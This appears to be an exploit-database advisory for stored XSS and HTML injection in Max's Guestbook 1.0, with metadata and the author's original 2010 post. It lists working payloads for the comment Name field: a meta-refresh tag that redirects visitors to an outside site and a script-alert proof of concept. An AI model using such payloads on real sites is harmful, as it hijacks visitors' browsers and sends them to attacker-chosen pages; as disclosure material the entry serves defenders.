Max's Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities

vendor:

Max's Guestbook

by:

MiND

8,8

CVSS

HIGH

XSS/HTML Injection

79 (Cross-site Scripting)

CWE

Product Name: Max's Guestbook

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpf1:max's_guestbook

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Max’s Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities

Add a new comment and the exploit is in Name. For HTML Injection, use <meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> and for XSS, use <script>alert('MiND - Sa-ViRuS.CoM')</script>

Mitigation:

Input validation and output encoding should be used to prevent XSS and HTML Injection attacks.

Source

Exploit-DB raw data:

================================================================
#                       In the name of ALLAH !                       #
======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __   __   /_  __/  #
#     / ___/  \ \  / /     / /     #
#    (__  )     \ \/ /     / /      #
#   /____/     \__/    /_/       #
#################################
########################################################################
# Name: Max's Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.phpf1.com/download.html?item=18
# Date: 2010-08-15
# Author: MiND
# Greets: Sa-ViRuS.CoM,RENO,Dr.php,!BaD BoY!,Gov.HaCker,AntiSeCuRe,Dr.$audi...
# Contact: SlaSHMiND@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################


[~] HTML Injection Vuln . :
Add A New Comment And The exploit is in Name :)
<meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> 
( thats redirecting to sa-virus.com ) 


[~] Xss Vuln. : 
Add A New Comment And The exploit is in Name :)
<script>alert('MiND - Sa-ViRuS.CoM')</script>



Peace